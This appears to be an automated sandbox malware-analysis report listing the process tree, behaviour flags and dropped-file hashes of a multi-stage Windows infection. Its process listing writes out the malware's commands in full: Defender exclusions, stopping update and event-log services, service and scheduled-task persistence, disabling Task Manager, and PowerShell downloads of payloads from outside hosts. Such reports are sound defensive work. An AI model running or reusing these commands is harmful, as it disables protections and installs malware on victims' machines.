C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffc6eaa3cb8,0x7ffc6eaa3cc8,0x7ffc6eaa3cd85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1896,1090031717807651078,5950998381244828439,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1908 /prefetch:25⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1896,1090031717807651078,5950998381244828439,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2364 /prefetch:35⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1896,1090031717807651078,5950998381244828439,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2924 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1090031717807651078,5950998381244828439,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1090031717807651078,5950998381244828439,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3132 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1090031717807651078,5950998381244828439,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5176 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1090031717807651078,5950998381244828439,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5196 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1896,1090031717807651078,5950998381244828439,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3304 /prefetch:85⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1090031717807651078,5950998381244828439,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3400 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1090031717807651078,5950998381244828439,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1896,1090031717807651078,5950998381244828439,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5616 /prefetch:85⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1896,1090031717807651078,5950998381244828439,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=3868 /prefetch:25⤵
-
C:\Users\Admin\AppData\Local\Temp\1000035001\gold.exe"C:\Users\Admin\AppData\Local\Temp\1000035001\gold.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
-
C:\Users\Admin\AppData\Local\Temp\1000047001\lummac2.exe"C:\Users\Admin\AppData\Local\Temp\1000047001\lummac2.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\1000064001\NewLatest.exe"C:\Users\Admin\AppData\Local\Temp\1000064001\NewLatest.exe"3⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe"C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\1000014001\1.exe"C:\Users\Admin\AppData\Local\Temp\1000014001\1.exe"5⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 468 -s 3886⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\1000015001\FirstZ.exe"C:\Users\Admin\AppData\Local\Temp\1000015001\FirstZ.exe"5⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart6⤵
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart7⤵
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc6⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc6⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv6⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits6⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc6⤵
- Launches sc.exe
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 06⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 06⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 06⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 06⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "WSNKISKT"6⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "WSNKISKT" binpath= "C:\ProgramData\wikombernizc\reakuqnanrkn.exe" start= "auto"6⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog6⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "WSNKISKT"6⤵
- Launches sc.exe
-
C:\Users\Admin\AppData\Local\Temp\1000091001\Installer.exe"C:\Users\Admin\AppData\Local\Temp\1000091001\Installer.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\cmd.execmd /c ins.bat4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /SC MINUTE /MO 10 /TN "CCleaner" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php"5⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /SC MINUTE /MO 11 /TN "Updater" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php"5⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://bit.ly/4c7L8Zs' -UseBasicParsing >$null"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\Users\Admin\AppData\Local\Temp\install.bat' -Verb runAs -WindowStyle Hidden"5⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\install.bat"6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /tn "Cleaner" /tr "C:\Users\Admin\AppData\Local\Corporation\File\RemoteExecuteScriptSilent.exe" /sc onstart /delay 0005:007⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /f /v DisableTaskMgr /t REG_DWORD /d 000000017⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /SC MINUTE /MO 10 /TN "CCleaner" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php" /F7⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /SC MINUTE /MO 11 /TN "Updater" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php" /F7⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://github.com/frielandrews892/File/releases/download/File/File.zip' -OutFile 'C:\Users\Admin\AppData\Local\Corporation.zip'"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Expand-Archive -Path 'C:\Users\Admin\AppData\Local\Corporation.zip' -DestinationPath 'C:\Users\Admin\AppData\Local\Corporation'"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\schtasks.exeschtasks /query /TN "Cleaner"5⤵
-
C:\Users\Admin\AppData\Local\Temp\1000092001\legs.exe"C:\Users\Admin\AppData\Local\Temp\1000092001\legs.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3584 -s 2524⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\1000094001\taskweaker.exe"C:\Users\Admin\AppData\Local\Temp\1000094001\taskweaker.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeC:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe4⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3584 -ip 35841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 468 -ip 4681⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exeC:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exeC:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe1⤵
- Executes dropped EXE
-
C:\ProgramData\wikombernizc\reakuqnanrkn.exeC:\ProgramData\wikombernizc\reakuqnanrkn.exe1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe2⤵
-
C:\Windows\explorer.exeexplorer.exe2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exeC:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exeC:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751Filesize
717B
MD5822467b728b7a66b081c91795373789a
SHA1d8f2f02e1eef62485a9feffd59ce837511749865
SHA256af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9
SHA512bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751Filesize
192B
MD50646a15c4cb5150a0edcf949c1878bb1
SHA19849572b66b83a70655eba95315009f1dbb0c351
SHA2568ef2230119a38411839a246d24220ed75b51d577c39551d2cd414401f425ba7d
SHA51205e593642363dcc476375d04de882a652f8821da94e9a05a71c530728159064b07bfc5fae6154ad5da8e26f129aeddfed37f74713fd915b1859e8487a4165080
-
C:\Users\Admin\AppData\Local\Corporation.zipFilesize
16.3MB
MD59cb5edb138b8df3492c0b14b56d617ac
SHA1b02dfae970d31251d2f94cf14328f757ceb45c98
SHA256de8c63974461298010c9b9c8a97e769f72f271e976bdbb54dee45264f8a0eda8
SHA51250306f663098471c9aa51d9024bce4b8a25baec2fab2424909b481a4d223feda5311111831eb9084115686782c0c831f81ef5ccdb32b7a6833ff811ff51d4929
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD55f4c933102a824f41e258078e34165a7
SHA1d2f9e997b2465d3ae7d91dad8d99b77a2332b6ee
SHA256d69b7d84970cb04cd069299fd8aa9cef8394999588bead979104dc3cb743b4f2
SHA512a7556b2be1a69dbc1f7ff4c1c25581a28cb885c7e1116632c535fee5facaa99067bcead8f02499980f1d999810157d0fc2f9e45c200dee7d379907ef98a6f034
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD56486ee9e961a437dadb68ff1544d18a8
SHA105f4daccca0bc1ce73fe71ad2325ba5dadd3df25
SHA2569a98b4686c9e90672a548c873943b3027fb111f7992263111d912318429f5834
SHA512ee3659f68a46f37f340f98b85a7aa289e700c5ced2a4f0104673bb5f18cc82d1e9b838ec0278407213c6ed2073998e7aad78a7a39390b7e460c8e26dfa91d0e9
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD52dfecbb576ee9795c5284da8a2a3c7f5
SHA1f1f0a6a97850aca2b4ab267a017564af02f24948
SHA256dca6901942fa748fc01339192c0738a06847d8497c9c61298f1e5df1f8352fb0
SHA512d664cc261113427810dd0b2d32763ddd08611a528fe6b285782d6b8ac03304b72a90fe7f3f7142e825ab8d948d5c9cf52f420546f3796b2ac23f3d00f3c17389
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent StateFilesize
179B
MD5acb27da5871accd423ae23c5527dfe56
SHA1d0bfb28a4bf124f04654a84a23134e2ac538b6b1
SHA2567ecce8c1dc7a58271d4d8ba7e62b229a9d0ff7151b4865177b0a6ee1befaf001
SHA512b789052a131b1843f1f8261ab4859e16b3cc852cb21c2392831d9e164c82a1b4a430d02ba0b2dff80473e959d5f578f6b2bfdf7d3bcf136cd311b192fa2ef43e
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
6KB
MD5b7c02cccdc0cd95efcd3ae860652c325
SHA1e906edfbb44ea27cdb9f8aa42d0fd1b5ac2f8994
SHA2567ea5d936cacee0a407fba40063777ed704a8207c5393e75506964d3f210c461a
SHA51202ec6514dd8d27e38ad8a1d5db880b426d96dc5a0a0dc632c90e173ecb6beecd997f26212db6bdc772f1121703894f5bffb4126295a8ed80c16027573bf8e873
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
5KB
MD5f52eb0cf1b86fba3072de88b27171a0a
SHA199ca18f2b78bdde5eff94b9fd4fab98fc0567877
SHA256d938ceaf77cdeca0ca0172ebe388075f6db56075745f4d575baaf011fa8b9425
SHA5126c43adc5338c0ec49735fd2760f10920759bb5b5d11c4fedc2ec2f826eff17289c645c708f988d3e1199296379ad3702752530b293c3c0ec468dd35b6dc1855a
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENTFilesize
16B
MD546295cac801e5d4857d09837238a6394
SHA144e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA2560f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA5128969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENTFilesize
16B
MD5206702161f94c5cd39fadd03f4014d98
SHA1bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA2561005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA5120af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
11KB
MD543a186da088700167c278f0504a4f438
SHA1b10a951ad498dd5d9f10bfa535eb8a8468e7c900
SHA2561fd86916d3da28419f9cc9bcf650f5bec6bcdfcd5c46ac2848f3e22807f776b8
SHA51251c5d0efff582110fdf724d4bc007ae121cbcd61adaf4f70b5bbf5c327b21af12f837c3a42a41a4f3c0cb93826bd201a2f86d3555b612df5fd4fe3abcce6a51c
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD517a60c9cac37cf5412f4cd266c22a435
SHA1648aed53b8f323be19dfb75e1c61e9dd95fdd0fd
SHA256de36be11adf1651810ebee5d6214786e3a6045ac7ee51730036385f504d4653d
SHA51243c8160d5e32d6aeae36201e7580dfd2d47b53ceba28443b2aedefd32377448296ce805669b5136686378603af1348d58fb40a59b906c28aed2df6f7d98b4044
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
64B
MD59345d44a4103cf05a75ac73e6b5b7f39
SHA183bfc53742c037ae47b3988ad2c9e0b597cfb0a0
SHA256b3fef132c6d5cd538b7af326287acc90d7d5081525a4d188a9dd9f92511c3799
SHA512bf9582a28031eb7ed5cb4442de8ff19b6eff29bac9041c1b4e290fdaea2b2d4105a7c6001b5a65abd5f12e5703f38c21a20351d882d58dffa27fda6d256bcf79
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD57355f4a1d4e1a2519a4a60ee11f1d192
SHA18802bbb71f3e8947c02a7d835b31c7abf4289780
SHA2562fac16b31607552d8f35d56232cb768ddc2f393c6162d243482466527005f4e3
SHA5127186100f86bc7a161667583daa5419d3b75acf620892610e0fab26866a4a300795a270bb5009b7af115216569c0d854fe1e3a68121af6f734fc16f7bfaed2d33
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD56d35322e3c2f8397eba8a34c6949b8bb
SHA1aa5a7c25e187958914d07891c2cad5c60bf8b07b
SHA256f0847952b26167264cb51c57e6d8d0babc4892e287f23832de65428f8fdeacb9
SHA512c357e3d424b2671d0cd0bd7728512c631fba41e178b2436179743be564b8f7c5a7e3fb1e6432a2b6dfbdbdd2f9f7d2f09736d628c2e43c0be8d02b47c1606a75
-
C:\Users\Admin\AppData\Local\Temp\1000007001\ama.exeFilesize
297KB
MD55d860e52bfa60fec84b6a46661b45246
SHA11259e9f868d0d80ac09aadb9387662347cd4bd68
SHA256b4a1e470f814bbcf1bc26c087eb513f4bab6165c90ecf43ac71dd87702561c30
SHA51204ea5757d01508a44e0152b3aa78f530908da649d59b8ce7ee3e15c2d4d0314c97f346c1e79b1810edb27165d04781c022937d02536dc9b1dd4c55f023a47701
-
C:\Users\Admin\AppData\Local\Temp\1000014001\1.exeFilesize
218KB
MD5d80bb65fe6aa18cc152a957eec8acfaa
SHA1b7fe6c68644aa5ec7641fa0c15dd9f5a00c9869b
SHA2565c2ab349bff2012fc64be9e71010c9852250e3b8aa5b71229a6e30e7e1ba8dc2
SHA512ead0b903092a722606fc08d7e05e210ae6d3003bb4c794ec2dd89164a7369df890c99bded1dcec50fd61059ad7ee96bdaae863a4fa1e1820901f90f0b4d4bb39
-
C:\Users\Admin\AppData\Local\Temp\1000015001\FirstZ.exeFilesize
2.5MB
MD5ffada57f998ed6a72b6ba2f072d2690a
SHA16857b5f0c40a1cdb0411eb34aa9fe5029bcdb84f
SHA256677f393462e24fb6dba1a47b39e674f485450f91deee6076ccbad9fd5e05bd12
SHA5121de77f83a89935bb3fc3772d5190c3827d76a998785d451e2c0d11a0061cfd28f1b96eccb41b012c76ddda2021e3333a0a647489ae3c6dac10cfb8302abdf33f
-
C:\Users\Admin\AppData\Local\Temp\1000035001\gold.exeFilesize
522KB
MD570a578f7f58456e475facd69469cf20a
SHA183e147e7ba01fa074b2f046b65978f838f7b1e8e
SHA2565c8d556e39269b22e63ba9c941ff306bb043bc35125ba08787617577231b381a
SHA512707ed48b45978d26faaf3544bf22912461503d6e4b1a077cbb7c3a8abd2f1eb3fec16b2786a79ae4db2dfec92f662ece1998bc142706d2b482599fb6191563c0
-
C:\Users\Admin\AppData\Local\Temp\1000047001\lummac2.exeFilesize
310KB
MD56e3d83935c7a0810f75dfa9badc3f199
SHA19f7d7c0ea662bcdca9b0cda928dc339f06ef0730
SHA256dc4f0a8e3d12c98eac09a42bd976579ccc1851056d9de447495e8be7519760ed
SHA5129f6b22bc9d0306a69d3c5bab83c7603fa23925c12089f9608772602ab2c4c0908cda2a3d9592fc0fab4aaff209ef41d3e2a931511ce9dfd027691e8dce9ad9b9
-
C:\Users\Admin\AppData\Local\Temp\1000064001\NewLatest.exeFilesize
415KB
MD507101cac5b9477ba636cd8ca7b9932cb
SHA159ea7fd9ae6ded8c1b7240a4bf9399b4eb3849f1
SHA256488385cd54d14790b03fa7c7dc997ebea3f7b2a8499e5927eb437a3791102a77
SHA51202240ff51a74966bc31cfcc901105096eb871f588efaa9be1a829b4ee6f245bd9dca37be7e2946ba6315feea75c3dce5f490847250e62081445cd25b0f406887
-
C:\Users\Admin\AppData\Local\Temp\1000091001\Installer.exeFilesize
154KB
MD55f331887bec34f51cca7ea78815621f7
SHA12eb81490dd3a74aca55e45495fa162b31bcb79e7
SHA256d7ab2f309ee99f6545c9e1d86166740047965dd8172aec5f0038753c9ff5e9d8
